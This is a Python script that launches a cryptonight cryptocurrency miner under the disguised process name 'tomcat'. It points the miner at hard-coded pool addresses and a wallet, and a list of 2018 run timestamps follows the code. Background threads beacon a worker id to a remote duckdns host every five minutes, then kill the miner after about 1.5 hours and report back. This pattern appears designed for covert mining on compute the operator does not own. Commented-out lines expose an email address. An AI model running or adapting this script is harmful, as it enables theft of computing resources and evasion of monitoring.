import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:06.788690
#2018-02-17 15:42:05.435026
#2018-02-17 17:19:06.773464
#2018-02-17 18:52:04.080009
#2018-02-17 20:24:05.439790
#2018-02-17 21:57:02.221095
#2018-02-17 23:27:04.430391
#2018-02-18 01:03:06.390949
#2018-02-18 02:38:04.234727
#2018-02-18 04:11:01.452419
#2018-02-18 05:46:01.774507
#2018-02-18 07:24:06.242072
#2018-02-18 08:53:05.935359
#2018-02-18 10:25:01.423604
#2018-02-18 11:58:05.903562
#2018-02-18 13:31:06.645045
#2018-02-18 15:09:06.041147
#2018-02-18 16:40:06.522281
#2018-02-18 18:14:07.519124
#2018-02-18 19:45:06.723835
#2018-02-18 21:16:01.455626
#2018-02-18 22:49:07.644988
#2018-02-19 00:26:01.509567
#2018-02-19 01:55:07.426050
#2018-02-19 03:31:04.691748
#2018-02-19 05:00:08.224293
#2018-02-19 06:34:05.386691
#2018-02-19 08:12:01.512633
#2018-02-19 09:47:02.007942
#2018-02-19 11:18:04.368623
#2018-02-19 12:50:07.283688
#2018-02-19 14:26:01.964408
#2018-02-19 15:59:06.892786
#2018-02-19 17:32:01.863751
#2018-02-19 19:04:05.246621
#2018-02-19 20:40:08.554868
#2018-02-19 22:16:05.621841
#2018-02-19 23:46:07.520198
#2018-02-20 01:21:06.029800
#2018-02-20 02:57:05.098812
#2018-02-20 04:31:05.861805
#2018-02-20 05:59:05.192717
#2018-02-20 07:35:08.631211
#2018-02-20 09:09:02.051434
#2018-02-20 10:39:06.860553
#2018-02-20 12:14:04.162025
#2018-02-20 13:50:02.768295
#2018-02-20 15:20:08.215952
#2018-02-20 16:54:02.031169
#2018-02-20 18:31:01.918413
#2018-02-20 20:09:07.687216
#2018-02-20 21:40:06.788428
#2018-02-20 23:12:01.342335
#2018-02-21 00:46:01.608520
#2018-02-21 02:24:04.903519
#2018-02-21 03:56:07.117585
#2018-02-21 05:34:04.542027
#2018-02-21 07:11:05.593165
#2018-02-21 08:44:01.729129
#2018-02-21 10:16:08.479173
#2018-02-21 11:53:01.495985
#2018-02-21 13:27:01.542865
#2018-02-21 14:56:01.346319
#2018-02-21 16:32:07.731863
#2018-02-21 18:09:01.707163
#2018-02-21 19:39:02.187896
#2018-02-21 21:17:08.893602
#2018-02-21 22:48:08.042467
#2018-02-22 00:24:08.868124
#2018-02-22 01:56:06.590963
#2018-02-22 03:31:04.012397
#2018-02-22 05:05:01.434731
#2018-02-22 06:35:07.224329
#2018-02-22 08:10:04.848634
#2018-02-22 09:46:06.279354
#2018-02-22 11:15:09.836814
#2018-02-22 12:48:06.887163
#2018-02-22 14:22:10.294125
#2018-02-22 15:58:06.939565
#2018-02-22 17:31:07.775941
#2018-02-22 19:04:04.343174
#2018-02-22 20:43:05.093622
#2018-02-22 22:11:04.473589
#2018-02-22 23:47:05.893765
#2018-02-23 01:20:08.137605
#2018-02-23 02:53:01.994579
#2018-02-23 04:28:05.313377
#2018-02-23 05:58:05.226755
#2018-02-23 07:31:06.355171
#2018-02-23 09:36:07.472517
#2018-02-23 11:18:07.797052
#2018-02-23 12:35:07.864311
#2018-02-23 14:02:06.109666
#2018-02-23 15:37:08.952818
#2018-02-23 17:12:04.663376
#2018-02-23 18:46:09.938010
#2018-02-23 20:20:06.844544
#2018-02-23 21:52:05.833848
#2018-02-23 23:27:04.663842
#2018-02-24 01:05:04.909642
#2018-02-24 02:44:04.132470
#2018-02-24 04:20:01.319703
#2018-02-24 05:47:02.019790
#2018-02-24 07:22:04.122882
#2018-02-24 08:56:07.087342
#2018-02-24 10:26:04.119716
#2018-02-24 12:09:05.726161
#2018-02-24 13:40:06.817821
#2018-02-24 15:11:05.276787
#2018-02-24 16:44:07.044155
#2018-02-24 18:18:06.313563
#2018-02-24 19:48:04.721939
#2018-02-24 21:20:03.673519
#2018-02-25 01:18:05.384262
#2018-02-25 05:18:03.742941
#2018-02-25 11:21:02.102916